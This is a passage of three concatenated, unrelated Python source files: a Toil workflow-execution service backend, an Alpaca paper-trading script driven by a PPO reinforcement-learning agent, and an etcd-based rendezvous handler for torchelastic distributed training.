if e.startswith(("--outdir=", "-o=")):
extra.remove(e)
if not cloud:
extra.append("--outdir=" + self.outdir)
if not self.jobstore:
extra.append("--jobStore=" + self.jobstore_default)
self.jobstore = self.jobstore_default
# store the jobstore location
with open(self.jobstorefile, "w") as f:
f.write(self.jobstore)
return extra
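    # Example (sketch): sort_toil_options([]) appends
    # "--outdir=<workdir>/outdir" and "--jobStore=file:<workdir>/toiljobstore",
    # while a cloud jobstore such as "--jobStore=aws:us-west-2:run1" is kept
    # as-is and no local --outdir is added (values illustrative).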
def write_workflow(self, request, opts, cwd, wftype="cwl"):
"""Writes a cwl, wdl, or python file as appropriate from the request dictionary."""
workflow_url = request.get("workflow_url")
# link the cwl and json into the cwd
if workflow_url.startswith("file://"):
try:
os.link(workflow_url[7:], os.path.join(cwd, "wes_workflow." + wftype))
except OSError:
os.symlink(
workflow_url[7:], os.path.join(cwd, "wes_workflow." + wftype)
)
workflow_url = os.path.join(cwd, "wes_workflow." + wftype)
try:
os.link(self.input_json, os.path.join(cwd, "wes_input.json"))
except OSError:
os.symlink(self.input_json, os.path.join(cwd, "wes_input.json"))
self.input_json = os.path.join(cwd, "wes_input.json")
extra_options = self.sort_toil_options(opts.getoptlist("extra"))
if wftype == "cwl":
command_args = (
["toil-cwl-runner"] + extra_options + [workflow_url, self.input_json]
)
elif wftype == "wdl":
command_args = (
["toil-wdl-runner"] + extra_options + [workflow_url, self.input_json]
)
elif wftype == "py":
command_args = ["python"] + extra_options + [workflow_url]
else:
raise RuntimeError(
'workflow_type is not "cwl", "wdl", or "py": ' + str(wftype)
)
return command_args
def write_json(self, request_dict):
input_json = os.path.join(self.workdir, "input.json")
with open(input_json, "w") as f:
json.dump(request_dict["workflow_params"], f)
return input_json
def call_cmd(self, cmd, cwd):
"""
Calls a command with Popen.
Writes stdout, stderr, and the command to separate files.
:param cmd: A string or array of strings.
        :param cwd: The working directory in which to run the command.
:return: The pid of the command.
"""
with open(self.cmdfile, "w") as f:
f.write(str(cmd))
stdout = open(self.outfile, "w")
stderr = open(self.errfile, "w")
logging.info(
"Calling: %s, with outfile: %s and errfile: %s",
(" ".join(cmd)),
self.outfile,
self.errfile,
)
process = subprocess.Popen(
cmd, stdout=stdout, stderr=stderr, close_fds=True, cwd=cwd
)
stdout.close()
stderr.close()
return process.pid
def cancel(self):
pass
def fetch(self, filename):
if os.path.exists(filename):
with open(filename) as f:
return f.read()
return ""
def getlog(self):
state, exit_code = self.getstate()
with open(self.request_json) as f:
request = json.load(f)
with open(self.jobstorefile) as f:
self.jobstore = f.read()
stderr = self.fetch(self.errfile)
starttime = self.fetch(self.starttime)
endtime = self.fetch(self.endtime)
cmd = [self.fetch(self.cmdfile)]
outputobj = {}
if state == "COMPLETE":
# only tested locally
if self.jobstore.startswith("file:"):
for f in os.listdir(self.outdir):
if f.startswith("out_tmpdir"):
shutil.rmtree(os.path.join(self.outdir, f))
for f in os.listdir(self.outdir):
outputobj[f] = {
"location": os.path.join(self.outdir, f),
"size": os.stat(os.path.join(self.outdir, f)).st_size,
"class": "File",
}
return {
"run_id": self.run_id,
"request": request,
"state": state,
"run_log": {
"cmd": cmd,
"start_time": starttime,
"end_time": endtime,
"stdout": "",
"stderr": stderr,
"exit_code": exit_code,
},
"task_logs": [],
"outputs": outputobj,
}
def run(self, request, tempdir, opts):
"""
Constructs a command to run a cwl/json from requests and opts,
runs it, and deposits the outputs in outdir.
Runner:
opts.getopt("runner", default="cwl-runner")
CWL (url):
request["workflow_url"] == a url to a cwl file
or
request["workflow_attachment"] == input cwl text (written to a file and a url constructed for that file)
JSON File:
request["workflow_params"] == input json text (to be written to a file)
:param dict request: A dictionary containing the cwl/json information.
:param str tempdir: Folder where input files have been staged and the cwd to run at.
:param wes_service.util.WESBackend opts: contains the user's arguments;
specifically the runner and runner options
:return: {"run_id": self.run_id, "state": state}
"""
wftype = request["workflow_type"].lower().strip()
version = request["workflow_type_version"]
if wftype == "cwl" and version not in ("v1.0", "v1.1", "v1.2"):
raise RuntimeError(
'workflow_type "cwl" requires '
'"workflow_type_version" to be "v1.[012]": ' + str(version)
)
if version != "2.7" and wftype == "py":
raise RuntimeError(
'workflow_type "py" requires '
'"workflow_type_version" to be "2.7": ' + str(version)
)
logging.info("Beginning Toil Workflow ID: " + str(self.run_id))
with open(self.starttime, "w") as f:
f.write(str(time.time()))
with open(self.request_json, "w") as f:
json.dump(request, f)
with open(self.input_json, "w") as inputtemp:
json.dump(request["workflow_params"], inputtemp)
command_args = self.write_workflow(request, opts, tempdir, wftype=wftype)
pid = self.call_cmd(command_args, tempdir)
with open(self.endtime, "w") as f:
f.write(str(time.time()))
with open(self.pidfile, "w") as f:
f.write(str(pid))
return self.getstatus()
def getstate(self):
"""
Returns QUEUED, -1
INITIALIZING, -1
RUNNING, -1
COMPLETE, 0
or
EXECUTOR_ERROR, 255
"""
# the jobstore never existed
if not os.path.exists(self.jobstorefile):
logging.info("Workflow " + self.run_id + ": QUEUED")
return "QUEUED", -1
# completed earlier
if os.path.exists(self.statcompletefile):
logging.info("Workflow " + self.run_id + ": COMPLETE")
return "COMPLETE", 0
# errored earlier
if os.path.exists(self.staterrorfile):
logging.info("Workflow " + self.run_id + ": EXECUTOR_ERROR")
return "EXECUTOR_ERROR", 255
# the workflow is staged but has not run yet
if not os.path.exists(self.errfile):
logging.info("Workflow " + self.run_id + ": INITIALIZING")
return "INITIALIZING", -1
completed = False
with open(self.errfile) as f:
for line in f:
if "Traceback (most recent call last)" in line:
logging.info("Workflow " + self.run_id + ": EXECUTOR_ERROR")
open(self.staterrorfile, "a").close()
return "EXECUTOR_ERROR", 255
if (
subprocess.run(
["toil", "status", "--failIfNotComplete", self.jobstorefile]
).returncode
== 0
):
completed = True
if completed:
logging.info("Workflow " + self.run_id + ": COMPLETE")
open(self.statcompletefile, "a").close()
return "COMPLETE", 0
logging.info("Workflow " + self.run_id + ": RUNNING")
return "RUNNING", -1
def getstatus(self):
state, exit_code = self.getstate()
return {"run_id": self.run_id, "state": state}
class ToilBackend(WESBackend):
processes = {}
def GetServiceInfo(self):
return {
"workflow_type_versions": {
"CWL": {"workflow_type_version": ["v1.0", "v1.1", "v1.2"]},
"WDL": {"workflow_type_version": ["draft-2"]},
"PY": {"workflow_type_version": ["2.7"]},
},
"supported_wes_versions": ["0.3.0", "1.0.0"],
"supported_filesystem_protocols": ["file", "http", "https"],
"workflow_engine_versions": ["3.16.0"],
"system_state_counts": {},
"key_values": {},
}
def ListRuns(self, page_size=None, page_token=None, state_search=None):
# FIXME #15 results don't page
if not os.path.exists(os.path.join(os.getcwd(), "workflows")):
return {"workflows": [], "next_page_token": ""}
wf = []
for entry in os.listdir(os.path.join(os.getcwd(), "workflows")):
if os.path.isdir(os.path.join(os.getcwd(), "workflows", entry)):
wf.append(ToilWorkflow(entry))
workflows = [{"run_id": w.run_id, "state": w.getstate()[0]} for w in wf] # NOQA
return {"workflows": workflows, "next_page_token": ""}
def RunWorkflow(self):
tempdir, body = self.collect_attachments()
run_id = uuid.uuid4().hex
job = ToilWorkflow(run_id)
p = Process(target=job.run, args=(body, tempdir, self))
p.start()
self.processes[run_id] = p
return {"run_id": run_id}
def GetRunLog(self, run_id):
job = ToilWorkflow(run_id)
return job.getlog()
def CancelRun(self, run_id):
# should this block with `p.is_alive()`?
if run_id in self.processes:
self.processes[run_id].terminate()
return {"run_id": run_id}
def GetRunStatus(self, run_id):
job = ToilWorkflow(run_id)
return job.getstatus()
def create_backend(app, opts):
return ToilBackend(opts)
|
alpaca_paper.py
|
'''Reference: https://github.com/alpacahq/alpaca-trade-api-python/tree/master/examples'''
import datetime
import threading
from neo_finrl.alpaca.alpaca_engineer import AlpacaEngineer
import alpaca_trade_api as tradeapi
import time
import pandas as pd
import numpy as np
import torch
'''please input your own account info'''
API_KEY = ""
API_SECRET = ""
APCA_API_BASE_URL = 'https://paper-api.alpaca.markets'
data_url = 'wss://data.alpaca.markets'
'''load prepared model'''
action_dim = 5
state_dim = 1+ 1 + 1+ 2*5+ 5*7
from elegantrl.agent import AgentPPO
agent = AgentPPO()
net_dim = 2 ** 7
cwd = './AgentPPO/test-v1'
agent.init(net_dim, state_dim, action_dim)
agent.save_load_model(cwd=cwd, if_save=False)
act = agent.act
device = agent.device
'''paper trading class'''
class PPO_PaperTrading:
def __init__(self):
self.alpaca = tradeapi.REST(API_KEY,API_SECRET,APCA_API_BASE_URL, 'v2')
stockUniverse = [
'AAPL', 'AMZN', 'FB', 'GOOG', 'NFLX'
]
self.stocks = np.asarray([0] * len(stockUniverse))
self.cash = None
self.stocks_df = pd.DataFrame(self.stocks, columns=['stocks'], index = stockUniverse)
self.stockUniverse = stockUniverse
self.price = np.asarray([0] * len(stockUniverse))
self.turb_bool = 0
self.equities = []
def run(self):
orders = self.alpaca.list_orders(status="open")
for order in orders:
self.alpaca.cancel_order(order.id)
# Wait for market to open.
print("Waiting for market to open...")
tAMO = threading.Thread(target=self.awaitMarketOpen)
tAMO.start()
tAMO.join()
print("Market opened.")
while True:
# Figure out when the market will close so we can prepare to sell beforehand.
clock = self.alpaca.get_clock()
closingTime = clock.next_close.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
self.timeToClose = closingTime - currTime
if(self.timeToClose < (60 * 15)):
# Close all positions when 15 minutes til market close.
print("Market closing soon. Closing positions.")
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
                    # pass args separately so the order is actually submitted on the worker thread
                    tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
# Run script again after market close for next trading day.
print("Sleeping until market close (15 minutes).")
time.sleep(60 * 15)
else:
# Trade and save equity records
trade = threading.Thread(target=self.trade)
trade.start()
trade.join()
last_equity = float(self.alpaca.get_account().last_equity)
cur_time = time.time()
self.equities.append([cur_time,last_equity])
np.save('./equity.npy', np.asarray(self.equities, dtype = float))
time.sleep(60)
def awaitMarketOpen(self):
isOpen = self.alpaca.get_clock().is_open
while(not isOpen):
clock = self.alpaca.get_clock()
openingTime = clock.next_open.replace(tzinfo=datetime.timezone.utc).timestamp()
currTime = clock.timestamp.replace(tzinfo=datetime.timezone.utc).timestamp()
timeToOpen = int((openingTime - currTime) / 60)
print(str(timeToOpen) + " minutes til market open.")
time.sleep(60)
isOpen = self.alpaca.get_clock().is_open
def trade(self):
state = self.get_state()
with torch.no_grad():
s_tensor = torch.as_tensor((state,), device=device)
a_tensor = act(s_tensor)
            action = a_tensor.detach().cpu().numpy()[0]  # detach() is not strictly needed inside torch.no_grad()
action = (action * 100).astype(int)
if self.turb_bool == 0:
min_action = 10
for index in np.where(action < -min_action)[0]: # sell:
sell_num_shares = min(self.stocks[index], -action[index])
qty = abs(int(sell_num_shares))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, self.stockUniverse[index], 'sell', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
for index in np.where(action > min_action)[0]: # buy:
if self.cash < 0:
tmp_cash = 0
else:
tmp_cash = self.cash
buy_num_shares = min(tmp_cash // self.price[index], abs(int(action[index])))
qty = abs(int(buy_num_shares))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, self.stockUniverse[index], 'buy', respSO))
tSubmitOrder.start()
tSubmitOrder.join()
self.cash = float(self.alpaca.get_account().cash)
else: # sell all when turbulence
positions = self.alpaca.list_positions()
for position in positions:
if(position.side == 'long'):
orderSide = 'sell'
else:
orderSide = 'buy'
qty = abs(int(float(position.qty)))
respSO = []
                tSubmitOrder = threading.Thread(target=self.submitOrder, args=(qty, position.symbol, orderSide, respSO))
tSubmitOrder.start()
tSubmitOrder.join()
def get_state(self):
AE = AlpacaEngineer(api=self.alpaca)
df = self.alpaca.get_barset(self.stockUniverse, '1Min', limit=1000).df
df = AE.add_technical_indicators(df, self.stockUniverse)
time = df.index
first_time = True
for stock in self.stockUniverse:
            if first_time:
closes = df[(stock,'close')].values
ary = np.vstack([time,closes]).T
tmp_df = pd.DataFrame(ary, columns = ['date','close'])
tmp_df['tic'] = stock
first_time = False
else:
closes = df[(stock,'close')]
ary = np.vstack([time,closes]).T
tmp_tmp_df = pd.DataFrame(ary, columns = ['date','close'])
tmp_tmp_df['tic'] = stock
tmp_df = tmp_df.append(tmp_tmp_df)
tmp_df = AE.add_turbulence(tmp_df)
turbulence_ary = tmp_df[tmp_df.tic==self.stockUniverse[0]]['turbulence'].values
turbulence_bool = (turbulence_ary > int(1e4)).astype(np.float32)
turbulence_ary = (turbulence_ary * 2 ** -7).clip((int(1e4)) * 2)
price_array, tech_array = AE.df_to_ary(df, self.stockUniverse)
price = price_array[-1]
self.price = price
tech = tech_array[-1]
turb = turbulence_ary[-1]
turb_bool = turbulence_bool[-1]
self.turb_bool = turb_bool
positions = self.alpaca.list_positions()
stocks = [0] * 5
for position in positions:
ind = self.stockUniverse.index(position.symbol)
stocks[ind] = ( abs(int(float(position.qty))))
self.stocks = stocks
stocks = np.asarray(stocks, dtype = float)
cash = float(self.alpaca.get_account().cash)
self.cash = cash
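        # Sketch of the state layout built below (5 tickers, 7 indicators):
        # [cash(1), price(5), turbulence(1), turbulence_flag(1), holdings(5), tech(35)]
        # i.e. 48 entries, matching state_dim = 1 + 1 + 1 + 2*5 + 5*7 above.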
state = np.hstack((max(cash, 1e4) * (2 ** -17),
price * (2 ** -9),
turb,
turb_bool,
stocks * (2 ** -5),
tech * (2 **-9),
)).astype(np.float32)
return state
def submitOrder(self, qty, stock, side, resp):
if(qty > 0):
try:
self.alpaca.submit_order(stock, qty, side, "market", "day")
print("Market order of | " + str(qty) + " " + stock + " " + side + " | completed.")
resp.append(True)
except:
print("Order of | " + str(qty) + " " + stock + " " + side + " | did not go through.")
resp.append(False)
else:
print("Quantity is 0, order of | " + str(qty) + " " + stock + " " + side + " | not completed.")
resp.append(True)
drl = PPO_PaperTrading()
drl.run()
|
custom_rendezvous.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import datetime
import json
import logging
import random
import sys
import threading
import time
from base64 import b64decode, b64encode
from typing import Optional
import etcd
from torch.distributed import Store, TCPStore, register_rendezvous_handler
from torchelastic.rendezvous import (
RendezvousClosedException,
RendezvousHandler,
RendezvousNonRetryableError,
RendezvousTimeoutException,
)
_log_fmt = logging.Formatter("%(levelname)s %(asctime)s %(message)s")
_log_handler = logging.StreamHandler(sys.stderr)
_log_handler.setFormatter(_log_fmt)
log = logging.getLogger(__name__)
log.propagate = False
log.setLevel(logging.INFO)
log.addHandler(_log_handler)
# Retryable failure exception means that we were too late to make
# a desired state transition (e.g. because of a race condition),
# and should now restart from the beginning.
# A small delay is recommended to avoid spamming Etcd.
class CustomRendezvousRetryableFailure(Exception):
pass
# Similar to retryable failure, but the new state we observed suggests we
# can re-try immediately, i.e. without a need for "safety delay".
class CustomRendezvousRetryImmediately(Exception):
pass
# Default overall timeout for rendezvous barrier.
CONST_DEFAULT_OVERALL_TIMEOUT = 600
# Additional waiting amount after reaching num_min_workers,
# for the case rendezvous is elastic (min != max):
CONST_DEFAULT_LAST_CALL_TIMEOUT = 30
# Various constants used internally in EtcdRendezvous
CONST_ETCD_SETUP_TTL = 5
CONST_ETCD_FROZEN_TTL = 10
CONST_ETCD_JOINABLE_EPHEMERAL_TTL = 10
# Ephemeral node TTL for worker's keep-alive key:
CONST_WORKER_KEEPALIVE_TTL = 10
# TTL for the ephemeral run_id-specific directory. All rendezvous state data
# for a specific run_id (job instance) is contained within directory.
# Its only role is to clean-up rendezvous data from old runs (for the case when
# etcd server is persistent), and has no effect on correctness, but should be
# larger than any timeouts that a worker process is expected to survive:
CONST_RUNID_SUBROOT_TTL = 7200 # 2 hours
# Delay (sleep) for a small random amount to reduce CAS failures.
# This does not affect correctness, but will reduce requests to etcd server.
def cas_delay():
time.sleep(random.uniform(0, 0.1))
class CustomRendezvousHandler(RendezvousHandler):
"""
Implements a :py:class:`torchelastic.rendezvous.RendezvousHandler`
interface backed by
:py:class:`torchelastic.rendezvous.etcd_rendezvous.EtcdRendezvous`.
Torchelastic uses a URL to configure the type of rendezvous to use and
to pass implementation specific configurations to the rendezvous module.
The basic etcd rendezvous configuration URL looks like the following
::
etcd://<etcd_address>:<port>/<job_id>?min_workers=<min_workers>&max_workers=<max_workers> # noqa W605
-- example --
etcd://localhost:2379/1234?min_workers=1&max_workers=3
The URL above is interpreted as follows:
1. Use the rendezvous handler that is registered with the ``etcd``
scheme
2. The ``etcd`` endpoint to use is ``localhost:2379``
3. ``job_id == 1234`` is used as the prefix in etcd (this allows one to
share a common etcd server for multiple jobs so long as the
``job_ids`` are guaranteed to be unique). Note that the job id can be
any string (e.g. does not need to be a number) as long as it is
unique.
4. ``min_workers=1`` and ``max_workers=3`` specifies a range for
membership size - torchelastic starts running the job as long as the
cluster size is greater than or equal to ``min_workers`` and admits
up to ``max_workers`` into the cluster.
Below are a full list of the parameters that can be passed to etcd
rendezvous:
+--------------------------------------------+--------------------------+
| Parameter | Description |
+============================================+==========================+
| min_workers | minimum number of |
| | workers for the |
| | rendezvous to be valid |
+--------------------------------------------+--------------------------+
| max_workers | maximum number of |
| | workers to admit |
+--------------------------------------------+--------------------------+
| timeout | total timeout within |
| | which next_rendezvous is |
| | expected to succeed |
| | (default 600s) |
+--------------------------------------------+--------------------------+
| last_call_timeout | additional wait amount |
| | (“last call”) after min |
| | number of workers has |
| | been reached (defaults |
| | to 30s) |
+--------------------------------------------+--------------------------+
| etcd_prefix | path prefix (from etcd |
| | root), inside which all |
| | etcd nodes will be |
| | created (defaults to |
| | ``/torchelastic/p2p``) |
+--------------------------------------------+--------------------------+
"""
def __init__(self, rdzv_impl):
self._rdzv_impl = rdzv_impl
def __del__(self):
# TODO: look into using weakref here instead.
del self._rdzv_impl
def next_rendezvous(self):
rdzv_version, rank, world_size = self._rdzv_impl.rendezvous_barrier()
log.info("Creating EtcdStore as the c10d::Store implementation")
store = self._rdzv_impl.setup_kv_store(rdzv_version)
return store, rank, world_size
def is_closed(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
return state["status"] == "closed"
except etcd.EtcdKeyNotFound:
# No rendezvous state, so it cannot be closed.
return False
def set_closed(self):
self._rdzv_impl.set_closed()
def num_nodes_waiting(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
if state["status"] == "final":
return state["num_workers_waiting"]
except etcd.EtcdKeyNotFound:
pass
return 0
def get_run_id(self) -> str:
return self._rdzv_impl._run_id
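# Example (sketch): a worker typically drives the handler with
#   store, rank, world_size = handler.next_rendezvous()
# and then uses `store` as the c10d Store when initializing its process
# group; the handler itself comes from the registered rendezvous URL
# described in the class docstring above.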
# TODO: we should probably handle a few additional errors,
# like EtcdLeaderElectionInProgress and EtcdWatcherCleared. These are
# only relevant for multi-node Etcd ensemble. A simple retry would work,
# but is verbose to add everywhere. Consider wrapping the client calls
# into auto-retry for these errors?
#
class CustomRendezvous(object):
"""
A rendezvous implementation that uses `etcd <https://etcd.io/>`__ as
the backend store.
"""
def __init__(
self,
endpoints,
prefix,
run_id,
num_min_workers,
num_max_workers,
timeout,
last_call_timeout,
**kwargs,
):
self._prefix = prefix
self._run_id = run_id
self._num_min_workers = num_min_workers
self._num_max_workers = num_max_workers
self._timeout = timeout
self._last_call_timeout = last_call_timeout
# For cleaning up TTL refresher threads (for ephemeral keys)
self._lease_run_id_stop = None
self._lease_this_rank_stop = None
if not self._prefix.endswith("/"):
self._prefix += "/"
self.client = etcd.Client(host=endpoints, allow_reconnect=True, **kwargs)
log.info("Etcd machines: " + str(self.client.machines))
# Setup a permanent prefix dir, if didn't exist
if self._prefix != "/":
self.create_path_if_not_exists(self._prefix)
# Lease a "sub-root" node specific to this job instance (run_id)
self.create_path_if_not_exists(self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL)
self._lease_run_id_stop = self.setup_lease_renewal(
self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL
)
# Subdir for all rendezvous work
self.create_path_if_not_exists(self.get_path("/rdzv"))
# Create a rendezvous version counter, if doesn't exist
try:
self.client.write(
key=self.get_path("/rdzv/version_counter"), value="0", prevExist=False
)
except etcd.EtcdAlreadyExist:
pass
def __del__(self):
# TODO: look into using weakref here instead.
if self._lease_run_id_stop is not None:
self._lease_run_id_stop.set()
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
def rendezvous_barrier(self):
"""
Main entry point for next rendezvous.
This method is blocking until rendezvous succeeds or a timeout occurs.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousTimeoutException - timeout waiting for rendezvous
RendezvousNonRetryableError - other persistent errors that
render the rendezvous non-retryable
RendezvousClosedException - rendezvous is or was closed while
waiting
"""
self._rendezvous_deadline = time.time() + self._timeout
while True:
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutException()
log.info("Attempting to join next rendezvous")
try:
# Dis-own our lease in the previous rendezvous, if exists
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
return self.init_phase()
except CustomRendezvousRetryImmediately:
# The type of failure suggests we can retry without delay
pass
except CustomRendezvousRetryableFailure:
# In case of retryable failure, wait a small delay
# to avoid spamming etcd
time.sleep(1)
except RendezvousTimeoutException:
log.info("Rendezvous timeout occured in EtcdRendezvousHandler")
raise
except RendezvousClosedException:
log.info(
f"Rendezvous for run_id={self._run_id} was observed to be closed"
)
raise
except RendezvousNonRetryableError:
raise
except Exception as e:
# In case of a general exception, wait a small delay
# to avoid spamming etcd
# FIXME: there are a few things that fall under this like
# etcd.EtcdKeyNotFound, etc, which could be handled more explicitly.
log.info("Rendezvous attempt failed, will retry. Reason: " + str(e))
time.sleep(1)
def init_phase(self):
"""
Initially, the rendezvous state is expected to be one of:
1. empty (non-existent) - in this case we try to create a new one.
2. joinable - we try to join it.
3. final - we announce ourselves as waiting, and go into monitoring mode
Any other state is considered transitional, and will be retried after
a short delay.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousClosedException - current rendezvous was/is closed
EtcdRendezvousRetryableFailure - observed some intermediate
state, which is best handled by retrying later
"""
try:
active_version = self.try_create_rendezvous()
state = json.loads(active_version.value)
log.info("New rendezvous state created: " + str(state))
except etcd.EtcdAlreadyExist:
active_version, state = self.get_rdzv_state()
# Note: it is possible for above query to fail (etcd.EtcdKeyNotFound),
# but this is ok for us - just means we'll restart from beginning.
log.info("Observed existing rendezvous state: " + str(state))
if state["status"] == "closed":
raise RendezvousClosedException()
if state["status"] == "joinable":
return self.join_phase(state["version"])
if state["status"] == "final":
self.handle_existing_rendezvous(state["version"])
raise CustomRendezvousRetryImmediately()
self.try_wait_for_state_change(etcd_index=active_version.etcd_index + 1)
raise CustomRendezvousRetryableFailure()
def join_phase(self, expected_version):
"""
We observed a rendezvous state in 'joinable' state, and attempt to join this
particular version, and then wait for all other peers to join.
"""
# Failure to join will propagate an exception, causing a re-entry.
active_version, this_rank = self.join_rendezvous(expected_version)
state = json.loads(active_version.value)
log.info(
"Joined rendezvous version {} as rank {}. Full state: {}".format(
state["version"], this_rank, state
)
)
# If this worker was first to reach num_min_workers requirement,
# and rendezvous is still joinable (therefore it is elastic),
        # then this worker will be responsible for waiting out the "last call"
# timeout and closing (i.e. transitioning to 'frozen') the rendezvous
# afterwards.
# As a safety against a potential failure of this worker (during the
# last call timeout), the rendezvous state is made ephemeral
# when min_num_workers is reached.
if this_rank == self._num_min_workers - 1 and state["status"] == "joinable":
log.info("Rank {} is responsible for join last call.".format(this_rank))
last_call_deadline = time.time() + self._last_call_timeout
self.handle_join_last_call(expected_version, last_call_deadline)
log.info("Rank {} finished join last call.".format(this_rank))
# Wait for rendezvous state to be frozen, which means a fixed set of peers
log.info("Waiting for remaining peers.")
active_version = self.wait_for_peers(expected_version)
state = json.loads(active_version.value)
assert (
state["version"] == expected_version
), "Logic error: failed to observe version mismatch"
return self.confirm_phase(expected_version, this_rank)
def confirm_phase(self, expected_version, this_rank):
"""
        Once the rendezvous state transitions from 'joinable' to 'frozen',
we have every participant confirm their membership and setup per-member
keep-alive TTL keys, and then wait for all other participants to confirm,
which would then successfully conclude this rendezvous.
"""
log.info("All peers arrived. Confirming membership.")
self.confirm_membership(expected_version, this_rank)
log.info("Waiting for confirmations from all peers.")
active_version = self.wait_for_final(expected_version)
state = json.loads(active_version.value)
log.info(
"Rendezvous version {} is complete. Final state: {}".format(
state["version"], state
)
)
# Rendezvous version number; our rank in it; world size
return state["version"], this_rank, len(state["participants"])
def handle_existing_rendezvous(self, expected_version):
"""
        Handle the case when there's an existing (state 'final') rendezvous already
in place, and we have to announce ourselves waiting, and wait until
the next rendezvous opportunity.
"""
# If state is 'final' -> increment num_workers_waiting
# Then, observe state changes:
# 1. if it's no longer final -> bail out and re-try
# 2. if keep alives are missing, destroy it and bail out.
active_state = self.announce_self_waiting(expected_version)
log.info(
"Added self to waiting list. Rendezvous full state: {}".format(
active_state.value
)
)
self.wait_for_rendezvous_to_free(expected_version)
log.info("Previously existing rendezvous state changed. Will re-try joining.")
def try_create_rendezvous(self):
"""
Create new rendezvous state or raise an exception that indicates
an unexpected state (e.g. already exists)
Raises:
RendezvousNonRetryableError - on unexpected state
"""
# Initially active_version is ephemeral - this is to handle the
        # possibility that we might fail to complete the setup transaction,
# i.e. the transition "setup" -> "joinable".
active_version = self.client.write(
key=self.get_path("/rdzv/active_version"),
value=json.dumps({"status": "setup"}),
prevExist=False,
ttl=CONST_ETCD_SETUP_TTL,
)
try:
version_counter = self.client.get(self.get_path("/rdzv/version_counter"))
version_counter.value = str(int(version_counter.value) + 1)
self.client.update(version_counter)
except (etcd.EtcdKeyNotFound, etcd.EtcdCompareFailed):
raise RendezvousNonRetryableError(
"Unexpected state of EtcdRendezvousHandler, worker needs to die."
)
# Any failure below results in declaring a retryable rendezvous failure.
# The ephemeral /rdzv/active_version will expire and someone can then
# re-try the setup process.
# Create directory node for participant data
self.client.write(
key=self.get_path("/rdzv/v_{}".format(version_counter.value)),
value=None,
dir=True,
prevExist=False,
)
# Publish rendezvous version and signal it is ready-to-be-joined.
# If rendezvous was set closed just before this, a retry will happen,
# where the closed condition will be handled.
return self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(
{
"status": "joinable",
"version": version_counter.value,
"participants": [],
}
),
prev_value=active_version.value,
)
def join_rendezvous(self, expected_version):
"""
Helper method for the join phase.
"""
# Use compare-and-swap to add self to rendezvous state:
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "joinable":
raise CustomRendezvousRetryableFailure(
"Rendezvous state became non-joinable before we could join. "
"Must join next one."
)
if state["version"] != expected_version:
raise CustomRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
assert (
len(state["participants"]) < self._num_max_workers
), "Logic error: joinable rendezvous should always have space left"
this_rank = len(state["participants"])
state["participants"].append(this_rank)
# When reaching min workers, or changing state to frozen, we'll set
# the active_version node to be ephemeral.
if len(state["participants"]) == self._num_max_workers:
state["status"] = "frozen"
state["keep_alives"] = []
set_ttl = CONST_ETCD_FROZEN_TTL
elif len(state["participants"]) >= self._num_min_workers:
set_ttl = CONST_ETCD_JOINABLE_EPHEMERAL_TTL
else:
set_ttl = None
try:
# Compare-and-swap.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=set_ttl,
)
# We succeeded joining.
return active_version, this_rank
except etcd.EtcdCompareFailed:
log.info("Join rendezvous CAS unsuccessful, retrying")
def wait_for_peers(self, expected_version):
"""
Helper method for the join phase.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Success, all peers arrived.
return active_version
elif state["status"] == "joinable" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise CustomRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def confirm_membership(self, expected_version, this_rank):
"""
Helper method for the confirm phase
"""
# Compare-and-swap loop
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "frozen":
raise CustomRendezvousRetryImmediately(
"Rendezvous no longer frozen, before we confirmed. "
"Must join next one"
)
if state["version"] != expected_version:
raise CustomRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
this_lease_key = self.get_path(
"/rdzv/v_{}/rank_{}".format(expected_version, this_rank)
)
self.client.set(this_lease_key, value=None, ttl=CONST_WORKER_KEEPALIVE_TTL)
state["keep_alives"].append(this_lease_key)
if len(state["keep_alives"]) == len(state["participants"]):
# Everyone confirmed (this rank is last to do so)
state["status"] = "final"
state["num_workers_waiting"] = 0
finalize = True
else:
finalize = False
try:
# Compare-and-swap. If new state is still frozen, keep it ephemeral.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=None if finalize else CONST_ETCD_FROZEN_TTL,
)
self._lease_this_rank_stop = self.setup_lease_renewal(
this_lease_key, ttl=CONST_WORKER_KEEPALIVE_TTL
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Confirm membership CAS unsuccessful, retrying")
def wait_for_final(self, expected_version):
"""
Helper method for the confirm phase
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "final" and state["version"] == expected_version:
